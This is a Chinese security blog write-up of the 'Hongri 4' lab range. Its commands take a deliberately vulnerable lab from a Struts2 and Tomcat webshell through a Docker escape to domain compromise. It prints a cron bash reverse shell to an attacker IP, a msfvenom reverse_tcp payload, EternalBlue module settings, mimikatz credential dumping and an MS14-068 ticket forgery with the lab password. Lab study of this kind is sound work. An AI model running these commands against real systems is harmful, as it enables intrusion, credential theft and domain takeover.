<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="红日靶场 4, marin的小窝">
    <meta name="description" content="红日靶场 4环境搭建web：

win7：Dotest123DC

DC：

web 需要启动一下 docker
sudo docker start ec 17 09 ad


外网渗透信息收集扫网段获取 ip 地址

然后扫端口

这里几">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>红日靶场 4 | marin的小窝</title>
    <link rel="icon" type="image/jpeg" href="/favicon.jpg">
    


    <!-- bg-cover style     -->



<link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
<link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
<link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
<link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
<link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
<link rel="stylesheet" type="text/css" href="/css/matery.css">
<link rel="stylesheet" type="text/css" href="/css/my.css">
<link rel="stylesheet" type="text/css" href="/css/dark.css" media="none" onload="if(media!='all')media='all'">




    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
    <link rel="stylesheet" href="/css/post.css">




    
        <link rel="stylesheet" type="text/css" href="/css/reward.css">
    



    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 8.1.1"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">marin的小窝</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>主页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>类型</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于我</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友链</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
  <li>
    <a href="javascript:;" class="waves-effect waves-light" onclick="switchNightMode()" title="深色/浅色模式" >
      <i id="sum-moon-icon" class="fas fa-sun" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">marin的小窝</div>
        <div class="logo-desc">
            
            一个学习网安的小菜鸡
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			主页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			类型
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于我
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友链
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/dauisgdascuigsgciua.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">红日靶场 4</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">
                                <span class="chip bg-color">内网渗透</span>
                            </a>
                        
                            <a href="/tags/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/">
                                <span class="chip bg-color">红日靶场系列</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/%E6%B8%97%E9%80%8F/" class="post-category">
                                渗透
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2026-03-23
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="红日靶场-4"><a href="#红日靶场-4" class="headerlink" title="红日靶场 4"></a>红日靶场 4</h1><h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h2><p>web：</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260323190009-vchsh5k.png" alt="image"></p>
<p>win7：Dotest123DC</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260323190018-5hs0zgv.png" alt="image"></p>
<p>DC：</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260323190026-zavy818.png" alt="image"></p>
<p>web 需要启动一下 docker</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">sudo docker start ec 17 09 ad</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260323194524-kf64rys.png" alt="image"></p>
<h2 id="外网渗透"><a href="#外网渗透" class="headerlink" title="外网渗透"></a>外网渗透</h2><h3 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h3><p>扫网段获取 ip 地址</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260323200507-07ybxb8.png" alt="image"></p>
<p>然后扫端口</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260323201024-od1q8tw.png" alt="image"></p>
<p>这里几个端口都挺少见的</p>
<p>2001 是一个文件上传</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260323200704-ir2dk6r.png" alt="image"></p>
<p>2002 是 Apache 中间件的页面</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260323200728-ck0v9c9.png" alt="image"></p>
<p>2003 是 phpMyadmin 的页面</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260323200747-ipq8pni.png" alt="image"></p>
<h3 id="初始访问"><a href="#初始访问" class="headerlink" title="初始访问"></a>初始访问</h3><h4 id="2001-端口"><a href="#2001-端口" class="headerlink" title="2001 端口"></a>2001 端口</h4><p>这里 nmap 扫描出来是 Struts2，网页也显示是这个框架，尝试使用工具一把梭，成功了，有好多个漏洞（</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260323201354-5asg38w.png" alt="image"></p>
<p>成功 getshell 了，不过这里是在 docker 环境里面，不像正常的服务</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260323201422-vwnsgyb.png" alt="image"></p>
<p>接下来要尝试容器逃逸</p>
<h5 id="容器逃逸（失败）"><a href="#容器逃逸（失败）" class="headerlink" title="容器逃逸（失败）"></a>容器逃逸（失败）</h5><p>先收集信息</p>
<p>查看 IP 地址，发现不是 192 的 IP，又验证了是容器</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325124404-mm9kvt4.png" alt="image"></p>
<p>查看提权信息，但是这里没有这个命令</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">capsh --print</code></pre>

<p>查看挂载情况，看看有没有敏感信息</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">cat &#x2F;proc&#x2F;self&#x2F;mounts</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260323201916-cm4o2et.png" alt="image"></p>
<p>查看系统版本，这里的 linux 版本有点低</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">uname -a</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260323202050-75zeqia.png" alt="image"></p>
<p>查看特权模式，如果容器是以 <code>--privileged</code> 启动时，docker 会赋予主机级权限，可以读写所有设备文件并挂载宿主机磁盘</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">cat &#x2F;proc&#x2F;self&#x2F;status | grep CapEff</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325124654-y8qwnfg.png" alt="image"></p>
<p>然后用命令查看这个具体有什么特权，这里没有特权，只能尝试使用一些组件漏洞</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">capsh --decode&#x3D;00000000a80425fb</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325124916-99aww2x.png" alt="image"></p>
<p>尝试使用 msf 上线，会更好操作一些</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">msfvenom -p linux&#x2F;x64&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;192.168.154.130 LPORT&#x3D;4444 -f elf -o shell.elf</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325133411-tmdurqu.png" alt="image"></p>
<p>msf 启动监听，执行文件后成功获得 meterpreter</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">use exploit&#x2F;multi&#x2F;handler
set payload linux&#x2F;x64&#x2F;meterpreter&#x2F;reverse_tcp
set LHOST 192.168.154.130
set LPORT 4444</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325133741-ep1we9w.png" alt="image"></p>
<p>主动识别可用模块，但是这里把服务扫爆了（</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">use post&#x2F;multi&#x2F;recon&#x2F;local_exploit_suggester
set SESSION 1</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325134146-7tgi77x.png" alt="image"></p>
<p>这里针对容器逃逸的好像就一个 <code>exploit/linux/local/docker_cgroup_escape</code>，但是也是需要特权的，没有成功</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325134650-sq12hvw.png" alt="image"></p>
<p>‍</p>
<h4 id="2002-端口"><a href="#2002-端口" class="headerlink" title="2002 端口"></a>2002 端口</h4><p>这里是一个 Apache Tomcat 的服务，版本是 <code>8.5.19</code> 搜索到有一个文件上传漏洞，这里后台有限制</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325160546-s2bbc8o.png" alt="image"></p>
<p>直接用 burp 抓包，然后将请求方法修改为 PUT，成功上传文件，测试直接上传 jsp shell</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325160726-c6jfm7i.png" alt="image"></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325164002-qlc9vde.png" alt="image"></p>
<p>直接上传 jsp 会被 waf，绕过方法是使用 <code>/</code>，直接上 webshell</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325160933-ca5pr8p.png" alt="image"></p>
<p>成功 getshell</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325164217-5alh7ly.png" alt="image"></p>
<h5 id="容器逃逸"><a href="#容器逃逸" class="headerlink" title="容器逃逸"></a>容器逃逸</h5><p>这个容器可以看到有特权，这里有 <code>cap_sys_admin</code> 这个主要的特权</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325164353-ywywl70.png" alt="image"></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325164504-stjiq7s.png" alt="image"></p>
<p>可以将宿主机的物理硬盘挂载到容器里，随意篡改，先查看容器中也没有宿主机的磁盘，这里确实有 <code>/dev/sda1</code>​，也有可能是 <code>/dev/vda1</code></p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">fdisk -l
lsblk</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325164837-0gr6p91.png" alt="image"></p>
<p>直接挂载这个磁盘，这里就可以修改宿主机的文件了，直接写 ssh 公钥</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">mkdir -p &#x2F;mnt&#x2F;host
mount &#x2F;dev&#x2F;sda1 &#x2F;mnt&#x2F;host</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325165021-cgl22vn.png" alt="image"></p>
<h6 id="ssh-（失败）"><a href="#ssh-（失败）" class="headerlink" title="ssh （失败）"></a>ssh （失败）</h6><p>创建 ssh 密钥，复制这个公钥文件</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">ssh-keygen -t rsa -b 4096 -f pentest_key -N &quot;&quot;</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325165618-oizybwt.png" alt="image"></p>
<p>先在目标中创建一个 <code>.ssh</code> 目录并给权限</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325165854-79l9g7g.png" alt="image"></p>
<p>然后将刚才的公钥命名为 <code>authorized_keys</code> 上传，还需要赋予命令</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">chmod 600 &#x2F;mnt&#x2F;host&#x2F;root&#x2F;.ssh&#x2F;authorized_keys</code></pre>

<p>然后直接连接，但是这里没成功，应该是配置不允许，需要修改配置</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash"># 允许 root 登录
sed -i &#39;s&#x2F;.*PermitRootLogin.*&#x2F;PermitRootLogin yes&#x2F;g&#39; &#x2F;mnt&#x2F;host&#x2F;etc&#x2F;ssh&#x2F;sshd_config

# 允许公钥认证
sed -i &#39;s&#x2F;.*PubkeyAuthentication.*&#x2F;PubkeyAuthentication yes&#x2F;g&#39; &#x2F;mnt&#x2F;host&#x2F;etc&#x2F;ssh&#x2F;sshd_config</code></pre>

<p>但是这个需要重启，这里没有成功重启，于是失败</p>
<h6 id="chroot（成功一半）"><a href="#chroot（成功一半）" class="headerlink" title="chroot（成功一半）"></a>chroot（成功一半）</h6><p>这个使用冰蝎的 shell 不成功，尝试 msf 上去行不行</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325172708-ev5ftaj.png" alt="image"></p>
<p>成功了，容器逃逸，但是这里测试了一下，只是把物理磁盘逃逸出来了，查看 ip 还是 docker 中的 IP</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">chroot &#x2F;mnt&#x2F;host &#x2F;bin&#x2F;bash</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325174102-zxxn4mz.png" alt="image"></p>
<h6 id="crontab"><a href="#crontab" class="headerlink" title="crontab"></a>crontab</h6><p>写计划任务来反弹 shell，成功</p>
<blockquote>
<p>这里不知道为什么前面 ssh 的重启写计划任务一直没有成功，可能就是不能用公钥连接把（</p>
</blockquote>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">echo &quot;bash -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;192.168.154.130&#x2F;6666 0&gt;&amp;1&quot; &gt; &#x2F;mnt&#x2F;host&#x2F;1.sh
echo &quot;* * * * * root bash &#x2F;1.sh&quot; &gt;&gt; &#x2F;mnt&#x2F;host&#x2F;etc&#x2F;crontab</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325175910-6gtm2i9.png" alt="image"></p>
<p>‍</p>
<h4 id="2003-端口"><a href="#2003-端口" class="headerlink" title="2003 端口"></a>2003 端口</h4><p>‍</p>
<h2 id="内网渗透"><a href="#内网渗透" class="headerlink" title="内网渗透"></a>内网渗透</h2><h3 id="隧道代理"><a href="#隧道代理" class="headerlink" title="隧道代理"></a>隧道代理</h3><p>这里要需要隧道代理出来，还是使用 msf 再次上线</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325180836-o8vz632.png" alt="image"></p>
<p>然后就是配置代理</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">run autoroute -s 192.168.52.0&#x2F;24
run autoroute -p</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325181111-plzz1ln.png" alt="image"></p>
<p>‍</p>
<h3 id="信息收集-1"><a href="#信息收集-1" class="headerlink" title="信息收集"></a>信息收集</h3><p>这里可以发现内网的网段 <code>192.168.52.0/24</code></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325180100-qmoo97v.png" alt="image"></p>
<p>然后扫内网，这个只扫描到了 <code>195.168.52.130</code>，这里应该还有一个 IP，发现是这个服务器的配置有问题，没有打开，其实应该是能扫到，这里就不重新扫了</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">proxychains4 nmap -Pn -sT -p 445,135,80 --open 192.168.52.0&#x2F;24</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325185813-9gnktlv.png" alt="image"></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325191156-p34eglb.png" alt="image"></p>
<blockquote>
<p>学到一个，这个很快</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">proxychains4 fping -aqg 192.168.52.0&#x2F;24</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325193208-5usfbhy.png" alt="image"></p>
</blockquote>
<p>然后重新扫描常用端口</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">proxychains nmap -sV -T4 192.168.52.130</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325195212-j0azdg2.png" alt="image"></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325193755-evsxr3i.png" alt="image"></p>
<p>有 445 端口，先尝试一下永恒之蓝</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">use exploit&#x2F;windows&#x2F;smb&#x2F;ms17_010_eternalblue 
# 设置正向连接，让目标机开放一个端口进行监听，攻击机主动连接这个端口
set payload windows&#x2F;x64&#x2F;meterpreter&#x2F;bind_tcp
set proxies socks5:127.0.0.1:1080
# 设置了一个自动运行的后渗透脚本，只要建立会话，就立即进程迁移
set autorunscript post&#x2F;windows&#x2F;manage&#x2F;migrate</code></pre>

<p>这里没有设置这个进程迁移就会一直失败</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325195818-9hkybm0.png" alt="image"></p>
<p>成功拿到了用户密码</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325195854-epu94ds.png" alt="image"></p>
<p>在用户的桌面发现了一个工具 <code>MS14-068</code></p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325200120-36ysm9r.png" alt="image"></p>
<p>查看这些参数</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325200224-hrzioof.png" alt="image"></p>
<blockquote>
<p><code>-u</code>：用户名@域名</p>
<p><code>-s</code>：用户 SID</p>
<p><code>-d</code>：域控制器地址</p>
<p><code>-p</code>：明文密码</p>
<p><code>--rc4</code>：没有明文密码的情况下使用 NTLM hash 登录</p>
</blockquote>
<p>接下来就是收集这些信息</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">kiwi_cmd sekurlsa::logonpasswords</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325201220-7n3sq8r.png" alt="image"></p>
<p>这个漏洞的原理是一个叫做 <code>PAC</code>​ 的认证，用户请求域控时，就会将用户的信息打包成 <code>PAC</code>​，放在 TGT 中发给用户，并且会签名<br>但是在有漏洞的地方，域控允许客户端指定签名算法，导致域控会将伪造的 <code>PAC</code> 封装成一个新的 TGT 返回给攻击者</p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash">MS14-068.exe -u douser@demo.com -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.52.130 -p Dotest123</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325201656-wxlebzq.png" alt="image"></p>
<p>这里会返回一个票据注入到内存中，我们还需要将这个票据注入到内存中</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325201731-s2vz42a.png" alt="image"></p>
<pre class="line-numbers language-bash" data-language="bash" data-start="1"><code class="language-bash"># 清空当前会话的票据
kerberos::purge 
# 注入伪造的票据
kerberos::ptc TGT_douser@demo.com.ccache</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325202033-v0c28hu.png" alt="image"></p>
<p>然后就拥有了域控权限</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325202411-pmc5zku.png" alt="image"></p>
<p>这里的工具都给备好，直接使用，测试已经成功了</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/image-20260325205946-x6c2nbf.png" alt="image"></p>
<p>‍</p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">Marin</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://wwwmarin.xyz/2026/03/23/hong-ri-ba-chang-4/">https://wwwmarin.xyz/2026/03/23/hong-ri-ba-chang-4/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">Marin</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">
                                    <span class="chip bg-color">内网渗透</span>
                                </a>
                            
                                <a href="/tags/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/">
                                    <span class="chip bg-color">红日靶场系列</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="far fa-dot-circle"></i>&nbsp;本篇
            </div>
            <div class="card">
                <a href="/2026/03/23/hong-ri-ba-chang-4/">
                    <div class="card-image">
                        
                        <img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/dauisgdascuigsgciua.jpg" class="responsive-img" alt="红日靶场 4">
                        
                        <span class="card-title">红日靶场 4</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2026-03-23
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E6%B8%97%E9%80%8F/" class="post-category">
                                    渗透
                                </a>
                            
                            
                        </span>
                    </div>
                </div>

                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">
                        <span class="chip bg-color">内网渗透</span>
                    </a>
                    
                    <a href="/tags/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/">
                        <span class="chip bg-color">红日靶场系列</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2026/03/23/hong-ri-ba-chang-3/">
                    <div class="card-image">
                        
                        <img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20230618_234051.jpg" class="responsive-img" alt="红日靶场 3">
                        
                        <span class="card-title">红日靶场 3</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2026-03-23
                            </span>
                        <span class="publish-author">
                            
